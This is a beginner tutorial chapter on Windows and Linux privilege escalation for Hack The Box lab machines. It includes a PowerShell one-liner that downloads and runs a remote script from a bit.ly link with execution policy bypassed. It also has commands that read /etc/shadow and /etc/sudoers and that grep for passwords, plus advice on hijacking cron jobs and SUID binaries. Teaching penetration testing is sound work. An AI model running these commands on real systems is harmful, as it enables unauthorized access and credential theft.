Part 4 - Privilege escalation
What do you learn in this part?
Privilege escalation
Windows
Linux
Boxes that are suitable for this part
Nibbles - 10.10.10.75
Bashed - 10.10.10.68
Other boxes
Celestial 10.10.10.85
Jerry 10.10.10.95
Privilege escalation
Everybody wants to be a hacker, but nobody wants to read no damn man page - Chris
The goal
Linux - Becoming root, id 0
Windows - Becoming NT AUTHORITY\SYSTEM or Administrator
What does it mean? Very often on Hackthebox and in real pentests we end up getting access to a system as a regular user or service account. This access always has a certain level of privilege on the system you are on. Most regular users are low privileged, that means they can't perform adminsitrative tasks, e.g. disable the antivirus, install new software, or open ports. Our goal is to get the highest level of privilege possible. In Windows that is called Administrative privilege and in Linux its called root or super user privilege.
Windows privilege escalation
Credential reuse
Sometimes a user that you have the credentials for is also the administrator on the system, but uses the same password for both accounts. So never forget to try passwords when you have the chance. Just don't overdo it so you trigger some lockout mechanism and get detected.
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group. As you can see from the output of the three commands below the username is hacker, he is part of the group administrators. In this case, a privilege escalation is not necessary because we are already in the administrators group!
whoami
net localgroup administrator
net user "%username%"
Kernel exploits
Metasploit exploit suggester can be used to find kernel exploits in Windows. That means exploits that allow for local privilege escalation from user and service accounts to administrator or SYSTEM. We don't cover it here as it was thoroughly covered in Part 1 - How to hack #Privilege Escalation
Run systeminfo
or sysinfo
to get some information about the OS installed hotfixes. If no hotfixes installed, few or no patches are installed, which means it is probably vulnerable to kernel vulnerabilites. Hence, privilege escalation using kernel exploits could be possible.
PowerUp
PowerUp is an extremely useful script for quickly checking for obvious paths to privilege escalation on Windows. It is not an exploit itself, but it can reveal vulnerabilities such as administrator password stored in registry and similar. We shamelessly use harmj0y's guide as reference point for the following guide. Some basic knowledge about how to import Powershell modules and used them is required.
Import the PowerUp module with the following:
PS C:\>
Import-Module PowerUp.ps1
If you want to invoke everything without touching disk, use something like this:
C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”
Finding stuff fast
findstr /s /C:"stringtosearchfor.txt" "C:*"
Service account escalation (potato)
There are several known techniques to escalate from service accounts to SYSTEM. The details of this exploit are slightly out of scope for what's supposed to be an entry level guide to hacking, but we chose to include it because it has saved us numerous times and because @decoder does such a good job with it. https://decoder.cloud/2017/12/23/the-lonely-potato/
Linux privilge escalation
Sudo
What is sudo?
sudo
is a command you will probably see a lot in the Linux world. It allows regular users to perform certain tasks as root user. This is useful for performing administrative tasks without switching to the root user all the time. It requires that the user has been added to the sudoers group. Of course we should abuse this. Try sudo -l
to find the commands the user you currently can run as sudo.
Linux permissions
In Linux, everything is a file. All files have owners and access permissions and we use that to our advantage
ls -l Desktop/
-rwxr-xr-x 2 chris meme.jpg 4096 Dec 1 11:45 .
This permissions indication is grouped into three categories: owner, group, world in that order. For each of those three a read, write and execute permission is set. Owner simply means the owner of the file, group means access to the file through being member of the appropriate group and world simply means any user on the system.
| rwx | r-x | x
Changing permissions to writable for the owner.
chmod +w script.sh
Confidential information and users
id
su
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
ls -alh /var/mail/
ls -ahlR /root
ls -ahlR /home/
Cron jobs - scheduled jobs that run every min/hour/day
ls -al /etc/cron
cat /etc/cron
crontab -l
If root runs a backup every other minute, what can we do? If it is a file or directory, we can hijack it if we have write permissions
World writable files and folders
find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print
find / -writable -type d 2>/dev/null
Generally interesting directories
ls -la /*
ls -la /var/log
ls -la /var/mail
ls -la /var/www/
ls -la /opt
Find interesting files and directories fast
find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
SUID files / binaries
The file will run as the owner no matter who executes it. So if root owns it, we can run it and hijack it to become root
find / -perm -u=s -type f 2>/dev/null
Look for Linux kernel exploits
First find what kernel and distro you are running. Then use searchsploit to identify whether there are any exploits available for privilege escalation
uname -a
cat /etc/*-release
cat /etc/issue
searchsploit kernel
Here you can see how we can find local privilege escalation exploits from Exploit-DB. If you look in the path on the right hand pane you can see some of them have "local" in the path, which means they are local privilege escalation exploits, which are those we want. Those that have "dos" in the path are for denial of service attacks, which won't be relevant. Note that kernel exploits are prone to crashing the operating system, so be very careful with running these. Make attempts to exhaust other alternatives before turning to kernel exploits.
Check running services and installed applications
ps -ef cat /etc/services
dpkg -l rpm -qa
An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box.
Last updated